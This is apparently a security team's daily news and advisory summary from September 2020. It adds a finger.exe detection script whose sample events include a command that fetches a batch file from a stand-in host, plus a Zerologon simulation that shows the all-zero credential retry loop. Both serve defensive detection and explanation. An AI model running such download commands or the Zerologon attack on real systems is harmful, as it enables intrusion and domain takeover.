Daily summary - 15.09.2020

End-of-Day report

Timeframe: Monday 14-09-2020 18:00 - Tuesday 15-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter

News

Windows 10 'Finger' command can be abused to download or steal files

The list of native Windows executables that can be abused to download or run malicious code keeps growing, as another one was reported recently.

https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
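finger.exe is a legitimate client for the finger protocol (TCP port 79), so a download or exfiltration through it looks like a normal remote query in process telemetry. The following Python is an added hunting example, not code from the article: it runs over constructed Sysmon-style events (EventID 1 process creation, EventID 3 network connection) and flags remote finger queries, finger spawned by Office or script hosts, shells that pipe or redirect finger output into a file, and any outbound TCP/79 connection. The field names, the suspicious-parent list and the sample records are assumptions about the telemetry, not facts from the page.

```python
"""Hunt for finger.exe used as a download/exfiltration LOLBin.

Added example (not from the bleepingcomputer article). Event shape and
field names follow Sysmon conventions and are an assumption about the
telemetry you actually have."""
import re

# Parents from which a finger.exe child is hard to explain legitimately (assumption).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

# Constructed sample telemetry; 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    # Word spawning finger.exe to fetch content from a remote finger daemon
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "finger.exe payload@203.0.113.5"},
    # ... and the matching outbound connection on TCP/79
    {"EventID": 3, "ProcessId": 4120, "Image": r"C:\Windows\System32\finger.exe",
     "DestinationIp": "203.0.113.5", "DestinationPort": 79, "Protocol": "tcp"},
    # cmd.exe redirecting finger output into a file (download to disk)
    {"EventID": 1, "ProcessId": 5100, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c finger stage2@203.0.113.5 > %TEMP%\\s2.bat"},
    # benign noise that must not trigger
    {"EventID": 1, "ProcessId": 6000, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 3, "ProcessId": 6300,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "203.0.113.7", "DestinationPort": 443, "Protocol": "tcp"},
]

# Shell command line in which finger's output is piped or redirected.
PIPED_FINGER = re.compile(r"\bfinger(\.exe)?\b[^|>]*[|>]", re.IGNORECASE)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt_finger(events):
    """Return one finding per suspicious event, in input order."""
    findings = []
    for ev in events:
        image = _basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if ev["EventID"] == 1 and image == "finger.exe":
            reasons = []
            if "@" in cmd:                       # user@host form = remote query
                reasons.append("query to a remote finger service")
            parent = _basename(ev.get("ParentImage", ""))
            if parent in SUSPICIOUS_PARENTS:
                reasons.append("spawned by " + parent)
            if reasons:
                findings.append({"ProcessId": ev["ProcessId"],
                                 "severity": "high" if len(reasons) > 1 else "medium",
                                 "reasons": reasons})
        elif ev["EventID"] == 1 and image in {"cmd.exe", "powershell.exe"} \
                and PIPED_FINGER.search(cmd):
            # The shell owns the pipe/redirect, so finger.exe's own command
            # line never shows where its output went; inspect the parent shell.
            findings.append({"ProcessId": ev["ProcessId"], "severity": "high",
                             "reasons": ["finger output piped or redirected by " + image]})
        elif ev["EventID"] == 3 and ev.get("DestinationPort") == 79:
            findings.append({"ProcessId": ev["ProcessId"], "severity": "medium",
                             "reasons": ["outbound TCP/79 from %s to %s"
                                         % (image, ev.get("DestinationIp", "?"))]})
    return findings


if __name__ == "__main__":
    for f in hunt_finger(SAMPLE_EVENTS):
        print(f)
```

The three findings can be correlated on ProcessId (the Word-spawned finger.exe and its TCP/79 connection share PID 4120). In most enterprise environments finger.exe is rare enough that even the medium-severity hits deserve a look, and blocking outbound TCP/79 at the egress firewall removes the download path entirely.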


Security vulnerability: eight zeros to Active Directory admin

The Zerologon vulnerability exploits a flaw in Netlogon and involves the number zero in a creative way, in this case to reset passwords.

https://www.golem.de/news/sicherheitsluecke-mit-acht-nullen-zum-active-directory-admin-2009-150869-rss.html
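The mechanism behind the "eight zeros" in the headline, shown as an added example rather than code from the article: Netlogon's AES variant of ComputeNetlogonCredential runs AES-CFB8 with an all-zero IV. If the client sends an all-zero 8-byte challenge, the ciphertext is all zeros exactly when the first byte of AES(K, 0^16) is zero, which holds for about one session key in 256, so an all-zero ClientCredential is accepted after roughly 256 attempts with fresh sessions. The script below replaces AES with a stand-in keyed block function (truncated SHA-256, an assumption so it runs without extra libraries); the property depends only on the CFB8 construction and the zero IV, not on the block cipher.

```python
"""Why an all-zero Netlogon credential is accepted for ~1/256 of session keys.

Added example, not the article's or Microsoft's code. AES is replaced by a
stand-in keyed block function; CFB8 only ever uses the forward direction,
so any keyed pseudorandom 16-byte function reproduces the behaviour."""
import hashlib

BLOCK = 16


def block_encrypt(key, block):
    """Stand-in for AES-128 encryption of one block (assumption, not AES)."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key, iv, plaintext):
    """CFB with an 8-bit feedback width, as Netlogon uses it.

    Each plaintext byte is XORed with the first byte of E(K, register);
    the resulting ciphertext byte is then shifted into the register."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_encrypt(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key, challenge):
    """ComputeNetlogonCredential (AES flavour): CFB8 with an all-zero IV."""
    return cfb8_encrypt(session_key, bytes(BLOCK), challenge)


def zero_credential_accepted(session_key):
    """Server-side check for a client that sent challenge = credential = 0^8."""
    return compute_netlogon_credential(session_key, bytes(8)) == bytes(8)


def first_keystream_byte_is_zero(session_key):
    """The one condition that decides the outcome: E(K, 0^16)[0] == 0.

    With IV 0 and plaintext 0, a zero first ciphertext byte leaves the
    register all zeros, so every later keystream byte is the same zero."""
    return block_encrypt(session_key, bytes(BLOCK))[0] == 0


def session_key(i):
    """Constructed per-session key; real keys derive from the server challenge."""
    return hashlib.sha256(b"constructed session key %d" % i).digest()[:BLOCK]


def simulate(n_sessions):
    """Count accepting sessions and confirm the first-byte prediction holds."""
    accepted = 0
    prediction_holds = True
    for i in range(n_sessions):
        key = session_key(i)
        ok = zero_credential_accepted(key)
        prediction_holds &= (ok == first_keystream_byte_is_zero(key))
        accepted += ok
    return accepted, prediction_holds


def attempts_until_accepted():
    """The attacker's loop: new session (new key) until the zero credential passes."""
    i = 0
    while not zero_credential_accepted(session_key(i)):
        i += 1
    return i + 1


if __name__ == "__main__":
    hits, consistent = simulate(20000)
    print("accepted %d of 20000 sessions (expected ~78), prediction consistent: %s"
          % (hits, consistent))
    print("attempts needed in this run:", attempts_until_accepted())
```

The same loop is what the public exploits run against NetrServerAuthenticate3; once authenticated with a known (zero) credential, NetrServerPasswordSet2 can set the domain controller's machine account password. The fix on the server side is to enforce signed and sealed Netlogon channels, which the August 2020 patch does.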


Successful attack campaign hits online shops based on Magento 1

Support for version 1.x of the Magento online shop software ended in June 2020. A current "Magecart" attack campaign is now targeting outdated shops.

https://heise.de/-4894269


Shitrix aftermath: Citrix systems with unnoticed backdoors

Backdoors have apparently been installed on Citrix ADC and NetScaler Gateways via the Shitrix vulnerability from the beginning of the year, through which ransomware can get in.

https://heise.de/-4901590


Extortion emails: criminals claim to have proof that you are cheating

Are you being blackmailed by email? Does the extortionist claim to have installed a virus on your smartphone that monitors your activity? Do they supposedly have evidence showing you cheating? Are they demanding a transfer of bitcoins in exchange for their silence? If so: don't worry! This is a fraudulent email that is currently being sent out en masse!

https://www.watchlist-internet.at/news/erpressungs-e-mails-kriminelle-haetten-beweise-dass-sie-fremdgehen/


Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits

We captured global network traffic from firewalls around the world and then analyzed the data to examine the latest network attack trends.

https://unit42.paloaltonetworks.com/network-attack-trends/


MITRE releases emulation plan for FIN6 hacking group, more to follow

New MITRE project to provide free emulation plans that mimic major threat actors in order to train and help defenders.

https://www.zdnet.com/article/mitre-releases-emulation-plan-for-fin6-hacking-group-more-to-follow/


Hackers are getting more hands-on with their attacks. That's not a good sign

Both nation-state-backed hackers and cyber criminals are trying to take advantage of the rise in remote working, and are getting more sophisticated in their approach.

https://www.zdnet.com/article/hackers-are-getting-more-hands-on-with-their-attacks-thats-not-a-good-sign/

Vulnerabilities

MFA Bypass Bugs Opened Microsoft 365 to Attack

Vulnerabilities 'that have existed for years' in WS-Trust could be exploited to attack other services such as Azure and Visual Studio.

https://threatpost.com/flaws-in-microsoft-365s-mfa-access-cloud-apps/159240/


VMware VMSA-2020-0020 (Sep 14)

VMware Workstation, Fusion and Horizon Client updates address multiple security vulnerabilities (CVE-2020-3980, CVE-2020-3986, CVE-2020-3987, CVE-2020-3988, CVE-2020-3989, CVE-2020-3990)

https://www.vmware.com/security/advisories/VMSA-2020-0020.html


Emergency patch available for Adobe Media Encoder

Attackers could attack Adobe's Media Encoder and leak information.

https://heise.de/-4901833


Vulnerability Spotlight: Memory corruption in Google PDFium

Google Chrome's PDFium feature could be exploited by an adversary to corrupt memory and potentially execute remote code. Chrome is a popular, free web browser available on all operating systems. PDFium allows users to open PDFs inside Chrome. We recently discovered a bug that would allow an adversary to send a malicious web page to a user and then cause out-of-bounds memory access.

https://blog.talosintelligence.com/2020/09/vuln-spotlight-google-pdfium-sept-2020.html


Security updates for Tuesday

Security updates have been issued by CentOS (dovecot), Debian (gnome-shell and teeworlds), Mageia (libetpan and zeromq), openSUSE (libxml2), Red Hat (chromium-browser and librepo), SUSE (compat-openssl098, firefox, kernel, openssl, and shim), and Ubuntu (gupnp).

https://lwn.net/Articles/831592/


Synology-SA-20:20 Photo Station

Multiple vulnerabilities allow remote attackers to execute arbitrary code via a susceptible version of Photo Station.

https://www.synology.com/en-global/support/security/Synology_SA_20_20


Security Bulletin: IBM Maximo Asset Management is vulnerable to Java Deserialization (CVE-2020-4521)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-management-is-vulnerable-to-java-deserialization-cve-2020-4521/


Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-a-missing-security-control-vulnerability-2/


Security Bulletin: IBM Maximo Asset Management is vulnerable to SQL Injection (CVE-2019-4671)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-management-is-vulnerable-to-sql-injection-cve-2019-4671/


Security Bulletin: Docker vulnerability affects IBM Spectrum Protect Plus (CVE-2020-13401)

https://www.ibm.com/blogs/psirt/security-bulletin-docker-vulnerability-affects-ibm-spectrum-protect-plus-cve-2020-13401/


Security Bulletin: Linux Kernel vulnerability affects IBM Spectrum Protect Plus (187206)

https://www.ibm.com/blogs/psirt/security-bulletin-linux-kernel-vulnerability-affects-ibm-spectrum-protect-plus-187206/


Security Bulletin: IBM Maximo Asset Management is vulnerable to cross-site request forgery (CVE-2020-4526)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-management-is-vulnerable-to-cross-site-request-forgery-cve-2020-4526/


Security Bulletin: Directory Traversal and Execution of Arbitrary Code vulnerabilities in IBM Spectrum Protect Plus (CVE-2020-4711, CVE-2020-4703)

https://www.ibm.com/blogs/psirt/security-bulletin-directory-traversal-and-execution-of-arbitrary-code-vulnerabilities-in-ibm-spectrum-protect-plus-cve-2020-4711-cve-2020-4703/


Security Bulletin: Cacheable HTTPS Response vulnerability in IBM Tivoli Business Service Manager (CVE-2020-4344)

https://www.ibm.com/blogs/psirt/security-bulletin-cacheable-https-response-vulnerability-in-ibm-tivoli-business-service-manager-cve-2020-4344/


Security Bulletin: A vulnerability in IBM Java SDK affects IBM Tivoli Business Service Manager (CVE-2020-14577)

https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-java-sdk-affects-ibm-tivoli-business-service-manager-cve-2020-14577/


Security Bulletin: Improper DLL loading vulnerability affecting Aspera Connect 3.9.9 and earlier

https://www.ibm.com/blogs/psirt/security-bulletin-improper-dll-loading-vulnerability-affecting-aspera-connect-3-9-9-and-earlier-3/